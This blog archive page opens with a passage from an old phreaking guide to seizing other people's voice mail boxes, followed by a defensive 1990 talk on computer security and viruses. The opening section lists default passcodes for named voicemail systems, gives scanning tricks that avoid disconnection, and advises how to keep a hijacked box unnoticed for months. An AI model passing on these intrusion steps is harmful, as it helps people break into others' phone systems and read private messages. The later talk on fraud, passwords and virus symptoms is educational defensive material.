your generic greeting for one week. After that week, if there are no<br />
messages from legitimate people, you can make your greeting say whatever you<br />
want. The whole process of getting a good vmb (that will last) takes about<br />
7-10 days, the more time you take the better chance you have of keeping it<br />
for long time. If you take it over as soon as you get in, it'll probably<br />
last you less than a week. If you follow these instructions, chances are it<br />
will last for months. When you take some boxes, do not take too many at one<br />
time. You may need some to scan from later. Plus listening to the messages<br />
of the legitimate users can supply you with needed information, such as the<br />
company's name, type of company, security measures, etc.<br />
SYSTEM IDENTIFICATION<br />
After you have become familiar with various systems, you will recognize them<br />
by their characteristic female (or male) voice and will know what defaults<br />
are most common and what tricks you can use. The following is a few of a few<br />
popular vmb systems.<br />
ASPEN is one of the best vmb systems with the most features. Many of them<br />
will allow you to have two greetings (a regular and an extended absence<br />
greeting), guest accounts, urgent or regular messages, and numerous other<br />
features. Aspens are easy to recognize because the female voice is very<br />
annoying and often identifies herself as Aspen. When you dial up an Aspen<br />
system, sometimes you have to enter an (*) to get into the vmb system. Once<br />
you're in you hit (#) to login. The system will respond with 'Mailbox number<br />
please?' If you enter an invalid mailbox the first time it will say 'Mailbox<br />
xxx is invalid...' and the second time it will say 'You dialed xxx, there is<br />
no such number...' and after a third incorrect entry it will hang up. If<br />
you enter a valid box, it will say the box owner's name and 'Please enter<br />
your passcode.' The most common default for Aspens is either box number or<br />
box number + (0). You only get three attempts to enter a correct box number<br />
and then three attempts to enter a correct passcode until it will disconnect<br />
you. From the main menu of an Aspen box you can enter (3) to scan for other<br />
boxes so you won't be hung up like you would from outside the box.<br />
CINDY is another popular system. The system will start by saying 'Good<br />
Morning/Afternoon/Evening. Please enter the mailbox number you wish...' and<br />
is easy to identify. After three invalid box entries the system will say<br />
'Good Day/Evening!' and hang up. To login, enter the box number and during<br />
the greet press (0) then your passcode. The default for ALL Cindy systems is<br />
(0). From the main menu you can enter (6) to scan for other boxes so you<br />
won't be hung up. Cindy voice mail systems also have a guest feature, like Aspens. You can make a guest account for someone, and give them<br />
password, and leave them messages. To access their guest account, they just<br />
login as you would except they enter their guest passcode. Cindy systems<br />
also have a feature where you can have it call a particular number and<br />
deliver a recorded message. However, I have yet to get this feature to work<br />
on any Cindy boxes that I have.<br />
MESSAGE CENTER is also very popular, especially with direct dials. To login<br />
on a Message Center, hit the (*) key during the greet and the system will<br />
respond with 'Hello . Please enter your passcode.' These vmbs are<br />
very tricky with their passcode methods. The first trick is when you enter<br />
an invalid passcode it will stop you one digit AFTER the maximum passcode<br />
length. Eg. If you enter 1-2-3-4-5 and it gives you an error message you enter the fifth digit, that means the system uses a four digit passcode, <br />
which is most common on Message Centers. The second trick is that if you enter<br />
an invalid code the first time, no matter what you enter as the second passcode<br />
it will give you an error message and ask again. Then if you entered the<br />
correct passcode the second and third time it will let you login. Also, most<br />
Message Centers do not have a default, instead the new boxes are 'open' and<br />
when you hit (*) it will let you in. After hitting (*) the first time to<br />
login a box you can hit (*) again and it will say 'Welcome to the Message<br />
Center.' and from there you can dial other extensions. This last feature can<br />
be useful for scanning outside a box. To find a new box, just keep entering<br />
box numbers and hitting (*) to login. If it doesn't say something to the<br />
effect of welcome to your new mailbox then just hit (*) again and it will<br />
send you back to the main system so you can enter another box. This way you<br />
will not be disconnected. Once you find a box, you can enter (6) 'M'ake a<br />
message to scan for other boxes with generic names. After hitting (6) it<br />
will ask for a mailbox number. You can keep entering mailbox numbers until<br />
you find a generic one. Then you can cancel your message and go hack it out.<br />
Q VOICE MAIL is a rather nice system but not as common. It identifies itself<br />
'Welcome to Q Voice Mail Paging' so there is no question about what system it<br />
is. The box numbers are usually five digits and to login you enter (0) like<br />
a Cindy system. From the main menu you can enter (3) to scan other boxes.<br />
There are many more systems I recognize but do not know the name for them. <br />
You will become familiar with these systems too. <br />
CONCLUSION<br />
You can use someone else's vmb system to practice the methods outlined above,<br />
but if you want a box that will last you need to scan out a virgin system. <br />
If you did everything above and could not get a vmb, try again on another<br />
system. If you follow everything correctly, I guarantee you will have more<br />
vmbs than you know what to do with. When you start getting a lot of them, i<br />
you are having trouble, or just want to say hi be sure to drop me a line on<br />
either of my internet addresses, or leave me a voice mail message.<br />
<br />
<br />
</div>Anonymoushttp://www.blogger.com/profile/02838058498179933086noreply@blogger.com0tag:blogger.com,1999:blog-4044212408950825345.post-65371066002489301412010-07-26T02:08:00.000+07:002010-07-26T02:08:05.020+07:00Computer Security 1 COMPUTER SECURITY<br />
-----------------<br />
<br />
<br />
The writer wishes to thank the Institution of Production Engineers and<br />
it's President for the invitation to make this presentation, and to<br />
express sincere appreciation to David Stang, Ph.D., Director of Research,<br />
National Computer Security Association, for his contribution both to this<br />
paper and to computer security in general. And I would be very remiss if<br />
I neglected to mention the professional secretarial assistance provided by<br />
Jane Templeman, who makes our whole team tick like the NRC official time<br />
clock - the one that gives the CBC time signal.<br />
<br />
This document is, hopefully, written softly: after all, it might be<br />
easier to digest if I have to eat my words. I do not profess to be "the<br />
expert" in the field of computer security; an expert is someone who knows<br />
more and more about less and less until s/he knows absolutely everything<br />
about nothing. I hope never to stop learning, which means (thankfully)<br />
I'll never be an expert.<br />
<br />
INDEX PAGE<br />
----- ----<br />
1. Definition/Scope of "COMPUTER SECURITY" 2<br />
2. Why Should You Be Concerned? 2<br />
3. Types of Security Breaches 3<br />
4. Reasons for Exposure 7<br />
5. General Security Rules (all computer systems) 8<br />
6. Viruses: 9<br />
6.1 History 9<br />
6.2 Effect 10<br />
6.3 Why do people do it? 10<br />
6.4 Symptoms 10<br />
6.5 Concerns 11<br />
6.6 Known Virus Software (1) 11<br />
6.7 Quick Guide to Virus Names (1) 12<br />
6.8 Table of Virus Effects 16<br />
6.9 Virus Detector/Antidote software 19<br />
6.10 Trojan Horses 20<br />
7. PC Rules of Thumb 22<br />
8. Easy Tricks for PC Security 23<br />
9. So You're Infected (Cure) 24<br />
10. Summary: What Can You Do? 25<br />
11. Security Policy: Points for Consideration 26<br />
12. To run SCAN (included on this diskette) 29<br />
<br />
(1) David Stang, Ph.D, "Network Security in the Federal Government,",<br />
January, 1990, p.168-169 (updated by E.A.Bedwell, March, 1990)<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 2 -<br />
Tonight's topic is "Computer Security," a subject near and dear to my<br />
heart after catching fraud a few times, and cracking system security a<br />
few times. The only unfortunate part of this evening is that I have<br />
enough material to cover an intensive 2 or 3 day seminar and I only have<br />
something over an hour, so in addition to extensive notes from this<br />
presentation, I've put an article on viruses, and a PC virus detector<br />
program on diskette for you.<br />
<br />
<br />
1. SCOPE OF COMPUTER SECURITY<br />
<br />
Computer security relates to any potential loss of information or your<br />
ability to operate, regardless of the source of the problem. Of course,<br />
all the publicity about computer security is going to the virus<br />
situation. I don't want to dissuade anyone from their concerns about<br />
viruses, because it's definitely a growing problem, and if you get hit,<br />
you'll be sorry you ever laid eyes on a computer. But, current estimates<br />
indicate that viruses represent only 3% of all the computer problems now<br />
occurring. Of course, if you're one of the 3%, like CNIB or Barclay's<br />
Bank Canada were last fall, you'll feel like you're the only one on<br />
earth. The difference between viruses and other computer security issues<br />
is apparently one of control: I hope to convince you that you have as<br />
much control over viruses and as little control over the other 97% of<br />
problems as to make them equal threats to the safety of your computer.<br />
<br />
I'm going to get to viruses later, their prevention, detection and cure,<br />
but I'd like first like to cover the other major problems that affect<br />
computer security - the other 97% - and I'd like to start with reasons<br />
why you should be concerned about security.<br />
<br />
<br />
2. WHY SHOULD YOU BE CONCERNED?<br />
<br />
Your data is a valuable asset, just like premises, equipment, raw<br />
materials and inventory. Because so much of modern business depends on<br />
computers - financial systems, engineering design, medical diagnosis,<br />
production and safety control - the destructive potential is greater<br />
every year. There has been more than one company that's suffered great<br />
losses, and even gone under because of the loss of things like their<br />
accounts receivable records: no one is going to pay you if you don't<br />
send them a bill, and if they get word of your inability to invoice them,<br />
their darned unlikely to volunteer payment - so you're in a financial<br />
mess. The same goes for your design information, production data, the<br />
consequences if safety control systems malfunction, or even the simple<br />
loss of your customer list.<br />
<br />
Another reason why you should be concerned is, too often, people don't<br />
think about computer security until it's too late. There's a saying in<br />
my industry that, "He who laughs last probably made a backup." Another<br />
saying is, "Experience is something you don't get until just after you<br />
needed it the most." Well, if it means the life of your company, or the<br />
loss of potentially millions of dollars, or even just the information on<br />
your home computer, it might be wise to get at least some basic knowledge<br />
before the disaster strikes.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 3 -<br />
<br />
3. TYPES OF SECURITY BREACHES<br />
<br />
Now that the 'why' is out of the way, let's break down the 97% of<br />
problems. These are not in a specific order, but just as they came to<br />
me. Nor have I attempted to attach percentages to each type of risk,<br />
because very few computer crimes are actually reported, so any figures<br />
that anyone could estimate would not be realistic:<br />
<br />
<br />
FRAUD/THEFT<br />
By far the biggest problem is fraud or theft. Some examples of this are:<br />
<br />
CHAOS - 1987 - Hamburg -> NASA data bank info sold to USSR<br />
<br />
Foreign exchange } famous because of big $<br />
Electronic Funds Transfer } amounts, and because of the<br />
Insider Trading } publicity they've received<br />
<br />
Most common: Cookie jar technique - e.g., interest, income tax<br />
(aka 'Salami' technique - take a little and no one<br />
will notice)<br />
<br />
Specific examples I've caught were in Payroll (no crash on < or =),<br />
Accounts Payable (dummy companies), Purchasing (failed reasonableness<br />
test), and Accounts Receivable (failed balance routine). These were all<br />
thefts of money.<br />
<br />
Another example of theft which is very interesting is the 28-year-old<br />
Canadian who was arrested at UNISYS in Pittsburgh on Dec. 13/89 - what he<br />
is alleged to have stolen was NCR's trade secrets - to the tune of<br />
US$68M, which comes under a different Canadian law from monetary theft.<br />
<br />
<br />
<br />
MALICIOUS DAMAGE / VANDALISM<br />
The next major type of computer security breach is the disgruntled<br />
employee syndrome. Their favourite is the logic bomb or time bomb: on a<br />
certain date or condition after they leave the company, something's going<br />
to happen, such as at the health centre in LA where all prescriptions<br />
suddenly multiplied by 2. That's really serious, even compared to the<br />
logic bomb that superzaps all your files off the face of the earth,<br />
because someone could die. At least with a superzap, you can recover if<br />
you've been backing up and have a disaster recovery plan in effect. Pure<br />
physical vandalism occurs more often at educational institutions, but is<br />
still a serious threat. I wouldn't let me near your machine if I was<br />
angry with you - my vandalism would be difficult to detect (and expensive<br />
to repair). A simple application of a magnetized screwdriver ......<br />
<br />
<br />
<br />
LACK OF SECURITY PLANNING IN SYSTEM DESIGN STAGE<br />
One of the biggest logic bombs that's going to occur is on January 1/2000.<br />
<br />
Do you know how many computer systems use a 2 digit number for the year? <br />
Do you know how much work it's going to be to adapt systems to recognize<br />
00 as being greater than 99? My grandmother was born in 1886, and most<br />
systems show her birth year as 99. If she lives to the year 1999, I<br />
wonder if they'll start sending her the baby bonus. This time bomb is not<br />
malicious damage, it's pure lack of planning at the system design stage. <br />
<br />
<br />
<br />
<br />
<br />
<br />
- 4 -<br />
<br />
(Lack of Security Planning - continued)<br />
<br />
Things like balance checks and reasonableness tests are not built into the<br />
system from the beginning, and it's not easy to put them in later. Users<br />
must participate at the system design stage, because only they know what's<br />
reasonable and what can be balanced. Don't expect a computer technician<br />
to know everything there is to know about your job.<br />
<br />
<br />
<br />
<br />
DISTORTED SENSE OF HUMOUR<br />
Then there's the practical joker - the one who thinks it's funny to break<br />
into the system to see what he can change, or create some dumb message to<br />
appear on your screen. That's what happened at IBM when the infamous<br />
Christmas tree appeared 2 years ago (1987). The joke was three-fold -<br />
first it analyzed your electronic mail distribution lists and reproduced<br />
itself to send to everyone you normally send messages to - this clogged<br />
the system up with people reading more messages than normal. The second<br />
part was a little more technical - everyone who read the message caused a<br />
separate load of the offending program to take up space in memory, unlike<br />
most systems where two or more people who are doing the same thing are<br />
sharing one load of the software. This clogged memory up so that nothing<br />
else could run. There was one more part to this: there were delay timers<br />
built into the program so it deliberately ran very slowly. The result was<br />
that the largest computer network in the world was shut down for 4 hours. <br />
Someone must have had a great need for a power trip.<br />
<br />
<br />
<br />
MISTAKE<br />
Next, there's fumble fingers: you know, the one who keys the formula in<br />
as 600 grams instead of 60 grams, or the estimated production time of 2<br />
hours instead of 2 days. Or the one who almost took me into court when<br />
he blamed "the computer" for a mistake. Without going into details about<br />
that incident, I can say that going through the grilling by several<br />
lawyers in a preliminary investigation was not the high point of my<br />
career. What saved the situation (for me and the organization) was audit<br />
trailing: every time a transaction was entered, the system recorded the<br />
terminal i.d., the user i.d., the date and the time. It also saved a copy<br />
of the record as it existed prior to the transaction taking place. A more<br />
common mistake, though, is to unlatch a diskette door before the light<br />
goes out. Few people realize that the FAT (file attributes table) is the<br />
last thing written on a disk, and you can corrupt the FAT by removing the<br />
disk too early.<br />
<br />
<br />
"EVERYONE DOES IT" SYNDROME<br />
Then there's everyone's favourite: copying software. Believe it or not,<br />
in Canada, that falls under the Copyright law, not under theft, but it<br />
has been successfully prosecuted. Even if you reverse engineer it and<br />
make some minor changes, it will come under the "look and feel" test of<br />
the Copyright law - if it looks and feels the same as the original, you<br />
can be prosecuted. Copying software is illegal, and your company as the<br />
registered owner could be held liable if it is detected.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 5 -<br />
<br />
ILLEGAL ACCESS<br />
Many major computer crimes are perpetrated by illegal access: the 14-<br />
year old who broke into NASA from his basement computer room is just one<br />
example. There is password software on all larger machines, and it's not<br />
difficult to put it on PCs. On the larger machines, one of the major<br />
problems is not changing the standard passwords that are set when the<br />
machine is delivered: the standard user-level password may be USER, the<br />
standard operator password may be OPERATOR, and the standard field repair<br />
person's password may be REPAIR, and so on. Guess how I've cracked<br />
security a couple of times. In a 1988 article by Dr. Cliff Stoll in<br />
"Computers and Security,", he reported that in 10 months of systematic<br />
testing on computers attached to the US Defense Data Network (Milnet),<br />
access was gained in 13% of the attempts simply by guessing at passwords!<br />
<br />
There should be some rules applied to passwords: not less than 7 or 8<br />
characters, must be changed at least every 60 days, don't use common<br />
things like names (another way I've broken security), don't share it<br />
under any circumstances and, for heaven's sake, don't post it on the<br />
front of your machine or leave it where someone can find it. It's your<br />
personal PIN - just like the money machine - and the information you're<br />
dealing with is worth money. Some of the most difficult passwords to<br />
break (take it from me) are "two words reversed" (e.g., boardwall,<br />
hornshoe, cuptea), or foreign language words (e.g., coupdegrace,<br />
millegrazie, caliente). Nonsense is good, too: geebleurql is nice. <br />
<br />
If you're installing password security on a PC, consider whether you<br />
should have it so tight that there is no recourse to the DOS level or no<br />
ability to boot from the A: drive. You'd need really good password<br />
software (or a good technician on staff) if you have both of these<br />
facilities - otherwise you can lock yourself out - but it's my preference<br />
(especially for the guy who's wiped his root directory twice).<br />
<br />
<br />
PHYSICAL SECURITY<br />
Finally, another area that affects computer security or your ability to<br />
carry on computer operations, and one that is often overlooked, is simple<br />
physical security: keys, thermal shock, vibration, dirt, water, fire,<br />
visibility of information, steady power supply, discharge of static<br />
electricity, magnetic fields, are all relevant to security. We have one<br />
man in our network who should have (a) cabling bolted to his computer and<br />
the floor, (b) a key to his unit, and (c) dust protectors (as well as<br />
password access only without recourse to the DOS level). <br />
<br />
When it comes to thermal shock, if you work in an area where the heat is<br />
reduced on winter weekends, I strongly recommend you leave your unit<br />
running over the weekend - just lock the keyboard. If the air<br />
conditioning is shut down, turn your unit off, and don't turn it on until<br />
the temperature is 23C or less. And please don't leave your machine<br />
sitting in the sun, or in front of an open window to attract dust. The<br />
internal temperature raises within 20 mins. or so to >30C, and the effects<br />
of thermal shock are such that it can, first, rock memory chips out of<br />
their sockets, and, worse, misalign the read heads on your disk drive so<br />
that nothing can be read.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 6 -<br />
<br />
(Physical Security - continued)<br />
<br />
Vibration, too, is a source of problems, especially for drives. The read<br />
heads actually float over the surface of drives, not on them the way a<br />
record player needle does, and the space tolerance between is measured in<br />
Angstroms (metric version of microinches). Vibration can cause the head<br />
to hit the drive, and you can say goodbye to whatever was written there.<br />
<br />
If you're in a particularly sensitive field, and your information is what<br />
might be called top secret to your company, you might also want to look<br />
at two protection devices: one is encryption, and the other is Tempest<br />
hardware or shielding. Encryption involves translating your data using<br />
algorithms to something unreadable, and de-coding it when you need it. It<br />
uses a "key" to choose the algorithm - dont' lose the key! It comes in a<br />
few forms: software controlled encryption, hardware based encryption, or<br />
a combination of the two. Most encryptors work with standard algorithms,<br />
but defense departments and other high-security installations prefer<br />
random algorithms. Tempest hardware, or shielding, protects against<br />
sniffing of signals. ( Signal emanation surveillance is called<br />
"sniffing.") I don't have a computer here to demonstrate this, but if<br />
you take an old battery-operated transistor radio and set the dial to the<br />
bottom of the AM band around 520, try passing it within a foot of your<br />
computer. Your ear might not pick up the individual signals, but I assure<br />
you there's equipment that does. That's why the US Army was blasting rock<br />
music around the Vatican Embassy when Noriega was there - to mask signals.<br />
<br />
More important to the average user, though, is avoidance of electro-<br />
magnetic fields (such as ringing phones near a disk or disk drive), and<br />
having an automatic disk head 'parker' that moves the heads to a safe zone<br />
every few seconds. That way, something like a brief power failure is less<br />
likely to cause a "head crash" on the disk.<br />
<br />
Simple visibility of information is a risk. Recently I went to a bank<br />
with a court order in hand to give me access to an account. The clerk<br />
simply turned the terminal toward me and, if I'd wanted to bother, I could<br />
have had the account numbers of two other people with identical names. <br />
There is screen saving software that will blank your screen after an<br />
inactivity duration you choose, and personnel should be made conscious<br />
that unauthorized viewing of information is a security risk. And watch<br />
what your staff throw out on paper, too.<br />
<br />
When it comes to fire and water, there are two basic rules that everyone<br />
can follow: first, don't smoke around the PC, and second, don't feed the<br />
PC coffee and donuts. You might be able to save a keyboard or some parts<br />
with a bath in distilled water, possibly followed by drying with a warm<br />
hair dryer, but there's no guarantee. I prefer pure isopropyl alcohol -<br />
without the hairdryer so I don't get fried in the process. Don't blast a<br />
computer with a fire extinguisher if you can avoid it. If you do have a<br />
fire or a flood, though, you'd better have a tested disaster recovery<br />
plan, and your backups stored off-site.<br />
<br />
<br />
All of these issues are reasonably within your control: fraud, theft,<br />
disgruntled employees, practical jokers, fumble fingers, software copying<br />
and physical security, at least as much as the infamous viruses that are<br />
around, but let's take a look at why you're at risk.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 7 -<br />
<br />
4. REASONS FOR EXPOSURE<br />
<br />
Concentration of data in one place<br />
<br />
Instantaneous adjustment<br />
<br />
Alteration without a trace<br />
<br />
Lack of visible records<br />
<br />
Complexity of the system<br />
<br />
Networking<br />
<br />
Technical persons can befuddle<br />
<br />
General ignorance by non-techie and management<br />
<br />
Detection problems<br />
<br />
Lack of training<br />
<br />
Security checks in programs not specified<br />
<br />
Systems not documented<br />
<br />
Limited staff resource for programming/management<br />
<br />
No separation of duties<br />
<br />
Possibility of enormous losses remaining undetected<br />
<br />
Reluctance to report - Embarrassment<br />
Lack of sufficient evidence to prosecute<br />
Cost to prosecute outweighs recovery<br />
Company policy ("Press would have a field day")<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 8 -<br />
<br />
5. GENERAL SECURITY RULES (All Systems, big and small)<br />
<br />
Disaster Recovery } Backup Backup Backup<br />
Plan } Restore (test it to make sure it works)<br />
<br />
Store your backup off-site (not in your car!)<br />
<br />
Physical security <br />
<br />
Password for access control (don't stick your password on <br />
the front of your machine!)<br />
<br />
Access to menu only - not to system control level<br />
<br />
Reasonableness tests<br />
<br />
Balance checks (rounding: up, down, (out?); cross-calculations<br />
<br />
Audit trails - all records (terminal i.d., user i.d., date and <br />
time stamping, history record retention)<br />
<br />
Fall-through coding (if it doesn't meet a condition, does it go to limbo)<br />
<br />
Payroll/Accounts payable: don't pay the same # twice<br />
<br />
Fault tolerance level supported (user friendly/hostile -<br />
balance between fault tolerance & productivity)<br />
<br />
Call back or no answer on dial-up systems<br />
<br />
UPS (Uninterrupted Power Supply, or allowance for graceful<br />
degradation) - or at least an automatic head parker<br />
<br />
Logical view rights (your user 'privileges' allows access only to the<br />
data you need to see, e.g., accounting clerks don't need to see<br />
production formulae)<br />
<br />
Multi-user environment: protection against deadly embrace<br />
<br />
Automatic logoff on inactivity timer / Screen saver<br />
<br />
Policy statement re purchasing/use/theft/illegal <br />
software, etc.<br />
<br />
Encryption (?) - don't lose the key!<br />
<br />
Shielding ("Tempest" hardware for secure systems)<br />
<br />
Educate users<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 9 -<br />
<br />
6. VIRUSES<br />
<br />
As in medicine, a virus needs an 'organism' to which it may attach itself,<br />
and a virus is 'contagious'. <br />
<br />
In the case of computers, a virus is usually a destructive piece of code<br />
which attaches to a working program, such as your word processor,<br />
spreadsheet or CAD/CAM software. Viruses are usually written to detect<br />
any load of a computer file that has an extension of .EXE, .COM, .OVL,<br />
.BIN - such extensions representing executable programs. Often, the<br />
virus loads itself into memory, then loads the program you just called, so<br />
the virus is sitting at the front. Then when you exit the program, the<br />
virus code calls for the re-writing of the program back onto the disk -<br />
with the virus still sitting at the front. Other viruses simply go<br />
straight into your boot sector, so they get loaded every time you turn on<br />
your machine. Some do both. <br />
<br />
However they 'hide', and whatever they attach to, they got to your machine<br />
on an infected diskette. If you are infected and then copy your software<br />
to use on another machine, guess what happens? Right! That's where the<br />
'contagious' element comes in.<br />
<br />
In 1989, more viruses were discovered than in all previous years. There<br />
were over 110 at the end of the year, and 7 were discovered in December<br />
alone. Sources have been from as far away as Pakistan and Bulgaria.<br />
<br />
Only .004% have reported infections, but most are not reported. Consider<br />
this: if only 1% were infected, that would be 1/2 million units in the<br />
U.S. alone. At a cost ranging from $300 to $3,000 per unit to recover,<br />
the problem starts to impact the economy as well as the productivity of<br />
staff at your organization. It cost one Texas company US$10M to shut<br />
down their 3,000-unit network for 4 days to find 35 infected units.<br />
<br />
One of the major problems with viruses is that 90% of the users who<br />
recover are re-infected within 30 days. One person at my organization<br />
was re-infected 7 times in 2 months! Most reinfections occur for one of<br />
two reasons (not necessarily in this order): your back-up was infected,<br />
or it was a virus that hid in the boot sector on track 0, and track 0 is<br />
not re-written by the standard "FORMAT" command (only a low-level format<br />
will get rid of a track 0 virus). Be careful of some new software as<br />
well: there has been more than one instance of shrink-wrapped software<br />
being infected (software companies have disgruntled employees, too, it<br />
seems).<br />
<br />
<br />
<br />
6.1 HISTORY<br />
<br />
1959 - Scientific American article about 'worms'<br />
1963 - caught my first two frauds (Payroll & Accounts Payable)<br />
1970 - Palo Alto lab - worm which directed activities<br />
1982 - Anonymous Apple II worm<br />
1984 - Scientific American CoreWare Series: held contest to<br />
find the most clever/difficult to detect 'bug'<br />
1987 - Apparent change from intellectual exercise to <br />
dangerous activity.<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 10 -<br />
<br />
6.2 EFFECT<br />
<br />
Massive destruction: Reformatting<br />
Programs erased<br />
Data file(s) modified/erased<br />
<br />
Partial/Selective destruction: Modification of data/disk space<br />
File allocation tables altered<br />
Bad sectors created<br />
If match with event, alter or delete<br />
<br />
Random havoc: Altering keystroke values<br />
Directories wiped out<br />
Disk assignments modified<br />
Data written to wrong disk<br />
<br />
Annoyance: Message<br />
Execution of RAM resident programs<br />
suppressed<br />
System suspension<br />
<br />
<br />
<br />
<br />
<br />
6.3 WHY DO PEOPLE DO IT?<br />
<br />
Financial gain<br />
Publicity<br />
Intellectual exercise<br />
Terrorism/Fanaticism/Vandalism<br />
Revenge<br />
Just plain wierd<br />
<br />
<br />
<br />
<br />
<br />
6.4 SYMPTOMS<br />
<br />
Change in file size (Usually on .COM, .EXE<br />
.OVL, .BIN, .SYS or .BAT files)<br />
Change in update time or date<br />
Common update time or date<br />
Decrease in available disk or memory space<br />
Unexpected disk access<br />
Printing and access problems<br />
Unexpected system crashes<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 11 -<br />
<br />
<br />
6.5 CONCERNS<br />
<br />
Variety: Virus vs Bug vs Worm vs Trojan Horse vs Superzapper<br />
vs Trap Doors vs Piggybacking vs Impersonation<br />
vs Wiretapping vs Emulation<br />
Strains / Complexity / Growing Sophistication<br />
Bulletin board use and free software<br />
Largest threats from taking computer work home<br />
Kids using same machine at home<br />
Networked mainframe systems<br />
Travel/airline computers (AA wiped out early 1989)<br />
Work message systems (E-Mail)<br />
POS terminals<br />
Banking / Credit Cards / Money Machines<br />
Income Tax records<br />
Health records<br />
<br />
<br />
**************************************************************<br />
* Global disaster may be on the way *<br />
* No specific laws to deal with malicious programming *<br />
* No single national centre to gather data on infections *<br />
**************************************************************<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
6.6 KNOWN VIRUS SOFTWARE<br />
<br />
12 viruses (and their strains) account for 90% of all PC infections:<br />
_<br />
|_| Pakistani Brain<br />
|_| Jerusalem<br />
|_| Alameda<br />
|_| Cascade (1701/1704)<br />
|_| Ping Pong<br />
|_| Stoned<br />
|_| Lehigh<br />
|_| Den Zuk<br />
|_| Datacrime (1280/1168)<br />
|_| Fu Manchu<br />
|_| Vienna (DOS 62)<br />
|_| April First<br />
<br />
<br />
<br />
<br />
<br />
- 12 -<br />
<br />
6.7 QUICK GUIDE TO VIRUS NAMES (Cross referenced)<br />
<br />
Name Synonym-1 Synonym-2 Synonym-3 Synonym-4<br />
<br />
1168 Datacrime-B<br />
1184 Datacrime II<br />
1280 Datacrime Columbus Day October 12th Friday 13th<br />
1536 Zero Bug<br />
1701/1704 Cascade Falling Letters Falling Tears Autumn Leaves<br />
1704 Cascade<br />
1704 Cascade-B<br />
1704 Cascade-C<br />
1704 Cascade-D<br />
1704 Format 1704 Blackjack Falling Letters<br />
1704 Blackjack 1704 Format Falling Letters<br />
1808 Jerusalem Black Box/Hole Israeli PLO 1808/1813<br />
1813 Jerusalem Black Box/Hole Israeli PLO 1808/1813<br />
2086 Fu Manchu<br />
2930<br />
3066 Traceback<br />
3551 Syslock<br />
3555<br />
123nhalf<br />
405<br />
500 Virus Golden Gate<br />
512 Virus Friday 13th COM virus<br />
648 Vienna DOS 62 DOS 68 Austrian<br />
AIDS VGA2CGA Taunt<br />
AIDS Info Disk<br />
Alabama<br />
Alameda Virus Yale Merritt Peking Seoul<br />
Alameda-B Sacramento Yale C<br />
Alameda-C<br />
Amstrad<br />
Anti<br />
Apple II GS LodeRunner<br />
April 1st SURIV01 SURIV02<br />
April 1st-B<br />
Ashar<br />
Austrian 648 Vienna DOS 62 DOS 68<br />
Australian Stoned New Zealand Marijuana<br />
Autumn Leaves Cascade 1701/1704 Falling Letters Falling Tears<br />
Basit virus Brain Pakistani Brain Lehore<br />
Black Box Jerusalem Israeli Black Hole 1808/1803 PLO<br />
Black Hole Jerusalem Black Box Israeli 1808/1813 PLO<br />
Black Hole Russian<br />
Blackjack 1704 1704 Format Falling Letters<br />
Bouncing Ball Vera Cruz Ping Pong Bouncing Dot Italian virus<br />
Bouncing Dot Italian virus Bouncing Ball Vera Cruz Ping Pong<br />
Brain-B Brain-HD Harddisk Brain Houston virus<br />
Brain-C<br />
Brain-HD Harddisk Brain Houston virus Brain-B<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
- 13 -<br />
<br />
Brain Pakistani Brain Basit virus Lehore<br />
Cascade 1701/1704 Falling Letters Falling Tears Autumn Leaves<br />
Cascade(-B-C-D) 1704<br />
Century Oregon Jan.1, 2000<br />
Century-B<br />
Chroma<br />
Clone<br />
Clone-B<br />
Columbus Day 1280/Datacrime October 12th Friday 13th<br />
COM virus 512 virus Friday 13th<br />
COM-B Friday 13th-B<br />
COM-C Friday 13th-C<br />
Cookie virus Sesame Street<br />
Dark Avenger<br />
Datacrime 1280<br />
Datacrime-B 1168<br />
Datacrime-II 1184<br />
dBASE virus<br />
Den Zuk Search Venezuelan<br />
Disk Killer Ogre<br />
Do-Nothing (don't believe it!)<br />
DOS-62 Vienna DOS-68 648 Austrian<br />
DOS-68 Vienna DOS-62 648 Austrian<br />
DOS-62 UNESCO<br />
DOS-62-B<br />
Falling Tears Cascade 1701/1704 Falling Letters Autumn Leaves<br />
Falling Letters 1704 Blackjack 1704 Format<br />
Falling Letters Cascade 1701/1704 Falling Tears Autumn Leaves<br />
Falling Letters-Boot Ping Pong B<br />
Fat 12 Swap Israeli Boot<br />
FluShot4 (a corrupted version of a virus detector - use FluShot4+)<br />
Friday 13th 1280/Datacrime Columbus Day October 12th COM<br />
Friday 13th-B COM-B 512 <br />
Friday 13th-C COM-C<br />
Fumble Type<br />
Fu Manchu 2086 <br />
Ghost-Boot<br />
Ghost-COM<br />
Golden Gate 500 Virus<br />
Golden Gate -B<br />
Golden Gate-C Mazatlan<br />
Golden Gate-D<br />
Harddisk Brain Brain-B Brain-HD Houston virus<br />
Holland Girl Sylvia<br />
Houston virus Brain-B Brain-HD Harddisk Brain<br />
Icelandic Disk-Crunching-virus Saratoga 2<br />
Icelandic 1 Saratoga 1<br />
Icelandic 2 System virus<br />
INIT29<br />
IRQ v. 41<br />
Israeli Friday13 Jerusalem Black Box/Hole 1808/1813 PLO<br />
Israeli Boot Swap Fat 12<br />
<br />
<br />
<br />
<br />
- 14 -<br />
<br />
Italian virus Bouncing Ball Vera Cruz Ping Pong Bouncing Dot<br />
Jan.1, 2000 Century Oregon<br />
Jerusalem Israeli Black Box/Hole 1808/1813 PLO Friday 13th<br />
Jerusalem-B New Jerusalem<br />
Jerusalem-C<br />
Jerusalem-D<br />
Jerusalem-E<br />
Jork<br />
Key<br />
Lehigh<br />
Lehigh-2<br />
Lehore Brain Pakistani Brain Basit<br />
